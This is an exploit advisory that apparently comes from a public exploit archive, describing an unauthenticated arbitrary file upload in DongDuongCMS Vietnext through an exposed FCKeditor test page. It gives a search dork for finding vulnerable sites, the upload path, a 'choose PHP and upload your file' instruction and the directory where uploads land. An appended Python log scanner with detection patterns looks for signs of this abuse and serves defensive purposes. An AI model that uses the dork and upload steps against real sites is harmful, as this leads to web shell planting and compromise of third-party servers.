- ####################################################################
- # Exploit Title : DongDuongCMS Vietnext Unauthorized File Insertion Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/03/2019
- # Vendor Homepages : dongduongcorp.com ~ dongduongcms.com ~ vietnext.vn
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Design by Vietnext ® site:vn
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030021
- ####################################################################
- # Software Description :
- ***************************
- DongDuongCMS Vietnext is a Vietnamese Web Hosting and Web Development Company.
- ####################################################################
- # Impact :
- **********
- DongDuongCMS Vietnext is prone to an arbitrary file upload vulnerability.
- An attacker may leverage this issue to upload arbitrary files to the affected computer; this can
- result in arbitrary code execution within the context of the vulnerable application.
- Weaknesses in this category are related to the management of permissions, privileges,
- and other security features that are used to perform access control.
- ####################################################################
- # Arbitrary File Upload / Unauthorized File Insertion Exploit :
- *****************************************************
- /jscripts/FCKeditor/editor/filemanager/upload/test.html
- Choose PHP and upload your file.
- # Directory File Path :
- *********************
- /vantindat/images/......
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
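For site owners checking whether the exposed FCKeditor file manager described above has been used, the following is an added example (not part of the original advisory or the vendor's code) that scans web access logs for requests to the file manager path and for script files served from an images directory. The log lines, the `CONNECTOR-PLACEHOLDER` and `/site/images/` paths, and the assumption that uploads land under a directory named `images` are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Path fragment from the advisory, matched case-insensitively.
FCK_RE = re.compile(r'/fckeditor/editor/filemanager/', re.I)
# Assumption: server-side script extensions are never legitimate under an images directory.
SCRIPT_RE = re.compile(r'/images/[^?]*\.(?:php\d?|phtml|phar|asp|aspx|jsp)(?:$|[?/])', re.I)

# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE = [
    '192.0.2.10 - - [04/Mar/2019:10:00:01 +0000] "GET /jscripts/FCKeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 1200 "-" "-"',
    '192.0.2.10 - - [04/Mar/2019:10:00:09 +0000] "POST /jscripts/FCKeditor/editor/filemanager/upload/CONNECTOR-PLACEHOLDER HTTP/1.1" 200 310 "-" "-"',
    '192.0.2.10 - - [04/Mar/2019:10:00:15 +0000] "GET /site/images/sample.php HTTP/1.1" 200 45 "-" "-"',
    '198.51.100.7 - - [04/Mar/2019:10:01:00 +0000] "GET /site/images/logo.png HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.8 - - [04/Mar/2019:10:02:00 +0000] "GET /site/images/x.php HTTP/1.1" 404 150 "-" "-"',
]

def scan(lines):
    """Return {client_ip: [(kind, method, path, status), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path = m.group(1, 2, 3)
        status = int(m.group(4))
        if FCK_RE.search(path):
            kind = "fck-upload-post" if method == "POST" else "fck-filemanager-probe"
            hits[ip].append((kind, method, path, status))
        elif SCRIPT_RE.search(path) and status == 200:
            hits[ip].append(("script-served-from-images", method, path, status))
    return dict(hits)

def high_priority(hits):
    """Clients that posted to the file manager and afterwards fetched a script from images."""
    out = []
    for ip, events in hits.items():
        kinds = [e[0] for e in events]
        if "fck-upload-post" in kinds and "script-served-from-images" in kinds[kinds.index("fck-upload-post"):]:
            out.append(ip)
    return sorted(out)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for ip, events in found.items():
        print(ip, events)
    print("investigate first:", high_priority(found))
```

A `fck-filemanager-probe` hit with status 200 also shows that the test page is still deployed and reachable on the server.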